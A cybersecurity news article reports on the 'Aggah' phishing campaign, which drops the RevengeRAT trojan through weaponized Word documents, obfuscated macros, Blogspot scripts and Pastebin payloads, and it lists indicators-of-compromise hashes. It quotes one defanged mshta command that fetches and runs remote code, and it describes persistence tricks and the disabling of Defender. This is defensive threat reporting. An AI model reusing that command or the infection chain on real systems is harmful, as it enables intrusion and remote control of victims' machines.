Friday, March 29, 2024

Hackers Drop RevengeRAT Malware On Windows System Via Weaponized Word Document

New Malware attack campaign dubbed “Aggah” targeting various countries via weaponized Word documents and infect the victims by dropping the available RevengeRAT from Pastebin.

Researchers from Palo Alto recently observed the largest malware campaign via telemetry and they named as Aggah based on the actor’s alias “hagga”.

Threat actors behind this campaign also make use of RevengeRAT, a publicly available Remote access trojan that has many leaked builders freely available in open source.

Attackers targeting various organization in Middle Eastern country,
United States, Europe, and Asia based countries to targeting business such as Technology, Retail, Manufacturing, State/Local Government, Hospitality, Medical, Technology, and other Professional business. 

Aggah Malware campaign Infection Process

Aggah malware campaign mainly delivering the malicious word document attachment via Spoofed email that posed as a legitimate email from a large financial institution in the Middle East.

Once the users click the attached Word document with the filename “Activity.doc”, it attempted to load a remote OLE document via Template Injection.

Also the document trick users in enabling content to run the macro and also force users to the open document only in the desktop versions of Microsoft Word.

Later a remote OLE document loads an another heavily obfuscated Excel document with a heavily obfuscated macro which is to decode and execute the following URL via the “Shell” command:

mshta hxxp://www.bitly[.]com/SmexEaldos3

Once the command gets executed, victims redirected to a blog hosted on blogspot[.]com that actually includes a JavaScript embedded that performs several activities including its attempts to kill the Microsoft Defender process by removing its signature set.

According to Palo Alto Research, The script hosted on Blogspot then carries out three main activities that include:

  1. Downloading a payload from a Pastebin URL
  2. Creating a scheduled task to periodically obtain and run a script from a Pastebin URL
  3. Creating an autorun registry key to obtain and run a script from a Pastebin URL

A malicious script hosted at Blogspot using Pastebin URL to obtain a portable executable payload and execute it.

Further Analysis reveals that the payload written in a .NET language and named “Nuclear Explosion,” which is a variant of RevengeRAT.

The script hosted at the Blogspot blog builds another command to create a scheduled task called “eScan Backup” that runs every 100 minutes. 

“RevengeRAT is a commodity Trojan that has many leaked builders freely available in open source, which makes attributing the tool’s use to a specific actor or attack campaign difficult.”

“To create the RevengeRAT payload used in this campaign, the actor would use the RevengeRAT server to compile an executable configured with the appropriate fields.”


RevengeRAT Builder Socket Key Setting

End of the process, RevengeRAT server will create a client executable with a default name of “Client.exe” which is used to infect the victim’s windows system.

Indicators of Compromise

Malicious Documents and Payloads
6101f3210638a6068a9d40077f958e8d8a99ffed686a48426784f368e0ac021b
89d302cfe11c5fdca420d12cc36d58b449f24ee761b822cb8a22497af7e873ba
248456219c1be39f494301a16cae0a4ed9676be8d1155fa8ba5540d223797e97
82e64d2233cd8e755fecfefbd976f6143138f9b33e037f24a25b05fe9abd5620
1eef9ef568703ba6558923ec88cf960ed86086d87488a188709d32827877f528
9b47e150a9259ae7a6df20f070dc9faf9d5a589347f8db8a9f64c64060cb7606
679f1d59116af145f4f7c1a4d1cdb66e4402b0da906a491e09071e8eac696a16
fa5500a45e98e084b489301fd109676a4d8b0d3b39df4d9e2288569e232a9401
98136bc4323e00f64b63d1035c313bc08fb56af7894ac050b8e9db6961593eef
c365b15cb567da7e9c04dffa0de1cb2b8104d5fe668c17691d8c68380bcd6d30
b9b67c885200f90eaf9c4911b3a7f5e6707bcb51d1b892df1bde11013a60f6b5
ec8ff76234aca351169e7cf4973b8b5d603fa165815107482cbd0d803a829e81
aaabc63bd58fa4b8e2cb79630ea5e24c55f29327cae8ca36aae3219b95100669
c87fb09929159c2dab63d609d7bde992ce979f3545fbe20ddca0a3f263d9603f
abba33bdc8cf21423202b000771ec10d8ab7248f199d8211e53be03c9905b0ed
a4c1a9d4a6be9290a58b282f6b7dc75ebd4d4e3866df4fdab80eac56274aabf1
947ddcefbb1170a6fbd1ba341c773444c1833bedecdb4d6684e05b8555765117
6fe3548e0dc7fb605ee69791b752df0d9f3d8f5db49b2811011ac2a092ab0a28
6def95b2858c043e261b8f4d440abc1436a9dc551906d86a37c5f3331af8cbfc
eacad199f02e26ccdc7a866c18e585f7ee7e2a80ef0325208ddb22b1d059be2f
d2a16840541f905f7bcecf64e2d7dc827f314c4b97daf6e4cc4262fd91fdd14c
61600526307ec08137967b49b230c03ce8a4e1d2f0d58ea2e5d8b2ab3bf92df7
8e6c25f517a69c5da329f858b291b4d146c3fd0dd07c17a1d8a6851cddb347eb
7acd5696306ae7ed8de112f096917487df2d01c2aa66b4b9d2a37ea36b597b1a
2815552fd2f57eba147715331f96387dcb4769d3af816e9db2195e5602fc3a1a
251e3e25584d1a654a395accbcfdb506ec8b9d7039cb3ab725e14415d3c71aad
f5e170571689b393139b9cea484a9683305129ecbf2ab4ebb93fc997ee1d31aa
77a1430cfd728daa7a61e10f3cdc3409104cae1aed65711c8f5ce425c6920cb7
9c8fa4205b2ed8a6f60156bdc39d33a23c6e503cf2f8e69d66bf2980e78bacef
c57ff49bfe21e345c2bde30bc8feb60626f3c7839b1c2e5a1f01b9a567f911d8
8e771cbb12b259d4d12feac34c80e95eb38228dea393d49e0b9cc6f19861847c
abcce639df67279c73f327b2c511183c00ca96555fe481a4ae417bf752c96efa
83d9c57cfc40457b072bdc0e062dd5ca4958a91d8cf3387dbedd99af753da640
5976fca040071eb33ca383412b915e5160133c4e0f8a07bbbaa478ceeee0a890
a5c3c96b655d3115a39875e0303951fef2f2d6119b0af9eaadf57bacfae3f5cb
10d4bd37cd29071186b4ef31341edb79a9ae05c6bc8d26c9850cfeccabb90d1f
89903b38efc7a86da63d547d3d4e3439d64656a030cb289eff4721bc5ada3e13
464f30101630f06013ea65e72b0c043fa1fc83440d9c3367e474d6309d3fe4c9
5e226f1c0729d1fbcf6e074e28009d35e2f6eaa4d4eb0c411892ea56e1299c86
f57fff1b8acdee475b161ec1313452f0fe66077142fc677a63f7914a96890bae
a1879f1f3c2bbb1a4cf8af8e54230c3b0b88c29e37902c88d37ec9d7a1138894
3fa2591b208137d68aa87da931d9cc152a62250b7d26755818f362fa5015a99a
87f43fd2f6c9d1439ceb250e3bd045a07d9a8c214cf17dc66a8c22a3846b6437
4e2997adac5ae57ab92512e5b02e9a5ceb588f287a68387420113ed7b3d347d2
d32f1bd358b97f8f1ae2295c7e8969fab1460d9d54c9528dcfbb42c96a74b31b
f69fff5106fc73672569abc62ad85cfa461c237d9222426db20d6565021c110f
5742ebd53b2b495df0c6bff8ddc17d1726cb8e76e269bd8207b07a0a3ee2b813
d2a2373a386392f72372c9a23b42b43fd2652b6dafce6a6d8d44368ccbfdadb6
b9f74a648b0202109d2c53d68a8474d6eabfefba28bf99a53517ece52da483d5
3088fcd46c51e7ace8aee4e9bfb018aa1d0b0a52fbea62e5ef121e4fe637ebfc
54cba5cfb44379f8a4aac2e1d93d7e8e2ba83afe312d2b1a4f9145846efcd413
00a002607b6e7938292e7ae81ca60d58a091c456ea4343210d4bb610b6edee01
4c29279f341f568056fe9e2ff8bfb2fcaf06b065246329ca9652fcd7986b405d
1d1904dad2df5d677342806cbf1b67b9840d1bc9c85c10928896fcfa91661762
5f762589cdb8955308db4bba140129f172bf2dbc1e979137b6cc7949f7b19e6f
b10519bb52656a09aa146305d8b2ec4aa55f3dba43c633d9de23046798a32a2f
b6db8716bedd23042883f31132fa00b4125c659f2799d239f42105367ff42aec
821e6f3faacb4edafa8ddb60f83a7c8e87845a07ad8d1f8362a7c68cd8a48343
1fd98d66d123d4d0c049b4e1053d22335ef9dcec9fdde398d608c7d7d23ed280
5ca968f9e6a97505abe7c732b5ee573f787b11f294ccbf3a96ae7b77ccce004c
26f5e813e34c05cd1e553224e5c8284ced7fa648d55725416232c24e58546e60
ef837119fc241e8fde85f36f4635a71f6b87aecf39dc979961be914f48c4ef4c
d7c92a8aa03478155de6813c35e84727ac9d383e27ba751d833e5efba3d77946
915535fd77ac89a3a86eca6b3a1f1852f69c141050754f059c094c39a9ee4259
0671a2b4ae1a94edca9f65f7d11199d6526cab1fd53911e114ab772900d8a583
ea3cab2a0b74e30c0d6812e3ef6fcc9e47ea723c98d39fa1e04d5edf03193ff0
de657d3538e96a8d2c74b7c4f8c6fb2e51d67f12d158abfea2964298a722993c
70657b183854550e77633f85d9e63fbf0b01a21131388228985322880b987b9a
bc8a00fddff73accaff5eb5f3a6ca182a5282502d7af054ca9176d2e98a5116a
c3f36883ebf928c8403e068648299b53b09fecb0f56986980319e83f13dc296c
0e5011ee17c5f9bbcad8df4dc2a971fe56346f8ca7ce4e93d25f3b02086c581c
51147c260c18d3e766006ae4ffa216d4c178c8ee669a83391fab0de98da24b27
e1eb9daa5fb43b9f07e2b75f931a815fd5adf7e3f8d4f885740202af886402da
08883b4d7081d51bb9d9429f856c7c4c95f47a22f38aeb48b7772635d718c7ca
12a7ac8838681a95339e24683c0c8e6410a040a8a8ce5fe72bc175b724cb0aa9

You can follow us on LinkedinTwitterFacebook for daily Cybersecurity updates also you can take the Best Cybersecurity courses online to keep your self-updated.

Also Read:

Hackers Used US-based Web Servers to Distribute 10 Malware Families Via Weaponized Word Documents

Emotet Malware Mass Attack Drops Nozelesn Ransomware on Enterprise Endpoint Systems Via Word Documents

APT-C-27 Hackers Launching njRAT Backdoor via Weaponized Word Documents to Control the Compromised Device

Hackers Launching Weaponized Word Document to Push Emotet & Qakbot Malware

Website

Latest articles

GoPlus’s Latest Report Highlights How Blockchain Communities Are Leveraging Critical API Security Data To Mitigate Web3 Threats

GoPlus Labs, the leading Web3 security infrastructure provider, has unveiled a groundbreaking report highlighting...

Wireshark 4.2.4 Released: What’s New!

Wireshark stands as the undisputed leader, offering unparalleled tools for troubleshooting, analysis, development, and...

Zoom Unveils AI-Powered All-In-One AI Work Workplace

Zoom has taken a monumental leap forward by introducing Zoom Workplace, an all-encompassing AI-powered...

iPhone Users Beware! Darcula Phishing Service Attacking Via iMessage

Phishing allows hackers to exploit human vulnerabilities and trick users into revealing sensitive information...

2 Chrome Zero-Days Exploited at Pwn2Own 2024: Patch Now

Google has announced a crucial update to its Chrome browser, addressing several vulnerabilities, including...

The Moon Malware Hacked 6,000 ASUS Routers in 72hours to Use for Proxy

Black Lotus Labs discovered a multi-year campaign by TheMoon malware targeting vulnerable routers and...
Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Mitigating Vulnerability Types & 0-day Threats

Mitigating Vulnerability & 0-day Threats

Alert Fatigue that helps no one as security teams need to triage 100s of vulnerabilities.

  • The problem of vulnerability fatigue today
  • Difference between CVSS-specific vulnerability vs risk-based vulnerability
  • Evaluating vulnerabilities based on the business impact/risk
  • Automation to reduce alert fatigue and enhance security posture significantly

Related Articles